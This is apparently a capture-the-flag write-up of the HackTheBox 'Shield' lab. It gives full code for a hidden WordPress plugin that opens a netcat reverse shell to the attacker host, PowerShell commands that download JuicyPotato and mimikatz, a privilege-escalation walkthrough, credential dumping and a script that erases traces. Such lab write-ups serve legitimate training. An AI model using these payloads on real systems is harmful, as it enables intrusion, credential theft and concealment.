Box 4: HTB - Shield

Trying to exploit the box manually w/o using Metasploit or other automated exploit tools, then learn lots of new things. We exactly do the same in OSCP exam.

Enumeration

As a routine, I use Nmap for port scanning and reconnaisance at the beginning. For explanation about nmap syntax and its parameter, visit this site: https://explainshell.com/

nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.29 --open

The nmap scanning result is very brief, not as my imagination. There’re only 2 opening ports for us to explore today: 80 (HTTP) and 3306 (Mysql default)

PORT   STATE SERVICE REASON         VERSION80/tcp   open  http    syn-ack ttl 127 Microsoft IIS httpd 10.03306/tcp open  mysql   syn-ack ttl 127 MySQL (unauthorized)

Let’s try connecting to the MySQL instance:

mysql -h 10.10.10.29

My machine is not allowed to connect to this MySQL server

Oh, so that’s what unauthorized from nmap scan meant.

Next, I change the target and aim at IIS Service enumeration with dirsearch. If you’ve never used this before, you can install it directly in Kali (sudo apt-get install dirsearch) or gitclone from https://github.com/maurosoria/dirsearch.

dirsearch.py -u http://10.10.10.29 -e html,js,php,old,bak

dirsearch tool

The default page of IIS Web service is the most boring.

IIS Default Website

But, with dirsearch, we found that this website is built with WordPress, then we can access its login page. If you can log in successfully, it’ll redirect you to WordPress Admin Panel.

Website built with WordPress
WordPress Login page

Let’s grab hosting data from HTTP headers (just in case) with curl, I’ve found some things interesting:

curl -I http://10.10.10.29/wordpress/wp-login.php-I, --head
(HTTP FTP FILE) Fetch the headers only! HTTP-servers feature the command HEAD which this uses to get nothing but the header of a document. When used on an FTP or FILE file, curl displays the file size and last modification time only.
HTTP Response Headers

Foothold

Shield is a 4th box from Starting Point path on HackTheBox. On this path, the later boxes use information (in a form of credentials) gathered from the previous ones. The previous one, we’ve got the credential from file dashboard.php: postgres/P@s5w0rd!. However, instead of username postgres, I try with root, admin and administrator → Fortunately, it worked with admin.

Successful login lead you to the WordPress Admin Panel as below:

WordPress Admin Panel

I found this tab Media → Library and hope I could upload the reverse shell then fire it. There is a Logo file available here and you can find the URL path to access it.

MediaLibraryAdd New to upload files

The URL we can use to access the file uploaded is http://10.10.10.29/wordpress/wp-content/uploads/<filename>. I’ve tried to upload the file and check some techniques in Bypass file extensions checks, but the webpage always shows error "Sorry, this file type is not permitted for security reasons.". This way is not okay.

I decided to search for other ways to deal with it. I selected "Inject Malicious Plugin" to upload netcat file to WordPress and open reverse shell connection. You can refer to this WordPress: Reverse Shell for another ways if you prefer.

To get access to the web server, I’m going to upload a payload with netcat binary (which has been rename to circumvent Windows Defender) and PHP file that establish reverse shell to my host.

pshield_plugin.php

This code hides plugin on the admin panel so it won’t be easy tracked by other hackers. Please note that this is useful, but not mandatory for this box.

<?php
/*
Plugin Name: It’s Not A Reverse Shell Plugin
Plugin URI: https://blog.cyberethical.me/
description: A plugin that definitely is not creating a revershe shell.
Version: 1.0
Author: Asentinn
Author URI: https://blog.cyberethical.me/
License: MIT
*/
function plugin_hide_pshield() {
global $wp_list_table;
$hidearr = array('pshield_plugin/pshield_plugin.php');
$myplugins = $wp_list_table->items;
foreach ($myplugins as $key => $val) {
if (in_array($key,$hidearr)) {
unset($wp_list_table->items[$key]);
}
}
}
remove_action('pre_current_active_plugins', 'plugin_hide_pshield');
add_action('pre_current_active_plugins', 'plugin_hide_pshield');
?>

wp_config.php

Executes reverse PowerShell! This is the main body we need, netcat executable file has been renamed.

# wp_config.php

<?php
system("nc123.exe -e cmd.exe 10.10.14.85 80")
?>

wp_cleanup.php

Allows to remotely delete the contents of the plugin, leaving only the main plugin file with the dummy data. This way if you want to update the payload, call this file and then deactivate and remove Example plugin.

# wp_cleanup.php

<?php

file_put_contents("pshield_plugin.php", base64_decode("PD9waHAgICAKLyoKICAgUGx1Z2luIE5hbWU6IEV4YW1wbGUKICAgUGx1Z2luIFVSSTogaHR0cHM6Ly9leGFtcGxlLmNvbQogICBkZXNjcmlwdGlvbjogCiAgIFZlcnNpb246IDEuMAogICBBdXRob3I6IE1lCiAgIEF1dGhvciBVUkk6IGh0dHBzOi8vZXhhbXBsZS5jb20KICAgTGljZW5zZTogTUlUCiAgICovCj8+Cg=="));

unlink("wp_config.php");
unlink("nc123.exe");
unlink(__FILE__);

?>

pshield_plugin.zip

Finally, compress all above files to .zip package. Plugin archive is ready for uploading.

Use command: zip pshield_plugin.zip *

WordPress Plugin archive

Now, we can upload this plugin to WordPress Panel and initiate the reverse-shell connection. Access Plugin → Add → Upload Plugin

Upload Plugin

Next, Browse and select the .zip archive we’ve created → Install Now

Install Now

After successful installation, we need to activate the plugin once again to begin using it.

Activate Plugin

Specially, as you can see - plugin is not visible. The only thing that reveals it is running is a number of visible plugins in comparison to All number on GUI. "Active Plugin" shows 3 items, though only display 2 of them.

Installed Plugins

After uploading the plugin and activating it, each time I want to get the CMD reverse shell I start netcat listener and navigate to the following URL:

http://10.10.10.29/wordpress/wp-content/plugins/pshield_plugin/wp_config.php

Yes, we’ve got the shell that we need! We’re accessing with built-in account iusr in IIS Web service for all anonymous authentication requests.

Reverse Shell

Privilege Escalation

You can the enabled privileges of this account with command:

whoami /priv

SeImpersonatePrivilege: Enabled

I want to start things off with this quote from @decoder_it: "if you have SeAssignPrimaryToken or SeImpersonatePrivilege privilege, you are SYSTEM". That’s a deliberately provocative shortcut obviously, but it’s not far from the truth. 😆

A little about theory, these two privileges are very powerful indeed. They allow you to run code or even create a new process in the context of another user. To do so, you can call CreateProcessWithToken() if you have SeImpersonatePrivilege or CreateProcessAsUser() if you have SeAssignPrimaryTokenPrivilege.

However, they both require a handle to a token. This allows a server application that is impersonating a client to create a process that has the security context of the client. Yes, these functions allow a server application to create a process in the security context of a client. This is indeed a very common practice for Windows services that expose RPC/COM interfaces for example. Whenever you invoke an RPC function exposed by a service running as a highly privileged account, this service might call RpcImpersonateClient() in order to run some code in your security context, thus lowering the risk of privilege escalation vulnerablities.

What we need though is a token for this user. The question is: how to capture such a token with a custom server application?

Exploit tools of the Potato family are all based on the same idea: Relaying a network authentication from a loopback TCP endpoint to an NTLM negotiator. To do so, they trick the NT AUTHORITY\SYSTEM account into connecting and authenticating to an RPC server they control by leveraging some peculiarities of the IStorage COM interface.

The idea behind this vulnerability is simple to describe at a high level:

  1. Trick the "NT AUTHORITY\SYSTEM" account into authenticating via NTLM to a TCP endpoint we control.
  2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the "NT AUTHORITY\SYSTEM" account. This is done through a series of Windows API calls.
  3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

From Privilege Escalation Abusing Tokens in HackTricks, we can use Juicy Potato tool to get the privilege escalation chain based on COM server, because we have SeImpersonatePrivilege. Let’s download the tool into the box and rename it.

Ideally, we’re going to trick COM Client (run as SYSTEM) trying to talk to us on a local TCP listener. COM is trying to talk to us using the RPC protocol. After that, we can use NTLM Relay in order to get an impersonation token. Finally, we use SeImpersonatePrivilege to impersonate this token and run a reverse-shell connection back to our Attacker machine.

This attack will allow us to run executables as the SYSTEM level process. This means that in addition to the JuicyPotato.exe tool, we’ll also need our own malicious file that we wish to execute. This could be many different things, but a common example would be a reverse shell payload.

First of all, I create a batch script to create a reverse connection with the command as below:

echo START C:\inetpub\wwwroot\wordpress\wp-content\plugins\pshield_plugin\nc123.exe -e cmd.exe 10.10.14.85 8080 > privesc.bat

Then, we need to download JuicyPotato binary from here. Build up a web server with your own machine and host the executable. Go to the directory contain that file and run simple command:

python -m SimpleHTTPServer 80

From the terminal for Shield box, use PowerShell command to download that file to the plugin’s folder, rename it to jp123.exe or anything you want:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.85/JuicyPotato.exe','C:\inetpub\wwwroot\wordpress\wp-content\plugins\pshield_plugin\jp123.exe')"

Up to now, we have been fully equipped to escalate the privilege to SYSTEM account.

JuicyPotato & batch script to run

Don’t forget to start your Netcat listener using the information we have defined in batch script:

sudo nc -lvnp 8080

Let’s go:

jp123.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\plugins\pshield_plugin\privesc.bat -l 8080Mandatory args for JuicyPotato:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port

If the above command returns an error, you may need to find a different CLSID. If that’s the case, you can find a different one from the following page: https://ohpe.it/juicy-potato/CLSID/. You might have to try multiple CLSIDs to get the right one that creates the needed process .Please note: this machine is Windows Server 2016 Standard from systeminfo command.

You can see more details about COM objects and CLISID here: https://www.varonis.com/blog/dcom-distributed-component-object-model

jp123.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\plugins\pshield_plugin\privesc.bat -l 8080 -c {F7FD3FD6–9994–452D-8DA7–9A8FD87AEEF4}
JuicyPotata called function CreateProcessWithTokenW successfully

This worked for me, the service is XblGameSave and CLSID is {F7FD3FD6–9994–452D-8DA7–9A8FD87AEEF4}. If everything works, Juicy Potato should execute .bat as SYSTEM. privesc.bat will be then loaded into memory, and establish a reverse shell connection to our Netcat listener. Running whoami in that connection should return SYSTEM.

Finally, View the root flag in Adminstrator’s desktop easily.

root flag

Post-exploitation

Because we’ve got the SYSTEM access, we can do anything we want. Notice that in C:\Users\ folder, I find there is another user sandra. I know that future boxes can use some credentials from this one → I’m downloading the mimikatz to read the logged in sandra user.

powershell -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.85/mc123.exe','mc123.exe')"

We execute mimikatz and use the sekurlsa command to extract logon passwords:

mimikatz.exe sekurlsa::logonpasswords

And we find the password Password1234! for domain user Sandra.

Cleanup

We can delete our plugin uploaded to WordPress and then clear the track about it. Call to:

http://10.10.10.29/wordpress/wp-content/plugins/pshield_plugin/wp_cleanup.php

This is the end for the 4th box on my journey to pursue OSCP certification. All feedback from you will help me complement the details much more when possible. It is a long road ahead for me 💪

THANKS FOR READING AND SUPPORTING!

“Remember, Hacking isn’t a race. It’s a test of will, patience, and preparation.”